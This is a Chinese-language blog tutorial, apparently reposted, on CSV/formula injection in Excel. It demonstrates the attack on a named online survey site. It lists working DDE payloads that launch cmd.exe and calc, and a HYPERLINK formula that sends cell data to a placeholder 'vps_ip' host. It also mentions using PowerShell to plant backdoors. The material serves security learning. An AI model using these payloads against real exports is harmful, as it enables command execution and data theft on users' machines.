csv注入漏洞原理&&实战

前言

 为了找工作,巩固巩固知识。本文会介绍 csv 注入漏洞的原理,最后给出一个示例。 

正文

csv 文件 和 xlsx 文件中的每一项的值如果是 =, @, +, - 就会被 excel 识别为一个 公式, 此时可以注入 系统命令 实现 命令执行。

常用 payload :

=cmd|'/c calc'!A0    # 弹计算器
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!''  # 弹计算器

=HYPERLINK("http://vps_ip?test="&A2&A3,"Error: Please click me!")  # 发起 http请求 获取数据


示例

目标网址

http://www.starrysurvey.com/

首先自己创建一个在线报表,然后 让用户 填入  payload

006daSSqgy1fyhyfnuluuj30lm0fvdg5.jpg

006daSSqgy1fyhyfw3c9oj31750lxgmv.jpg

打开导出的 xlsx 文件, 可以看到没被过滤,成功注入了表达式。 双击它在点出去(貌似这样才能使 excel 识别这个为 一个公式, excel 2007, 2010 测试) 即可打开 计算器

006daSSqgy1fyhyg234n1j30si067dfu.jpg

真正用于渗透测试的话,可以借助 powershell 等手段 植入后门。

参考

http://www.freebuf.com/articles/system/160797.html
https://www.contextis.com/blog/comma-separated-vulnerabilities
http://blog.knownsec.com/2016/05/csv-injection-vulnerability/

转载于:https://www.cnblogs.com/hac425/p/9416941.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值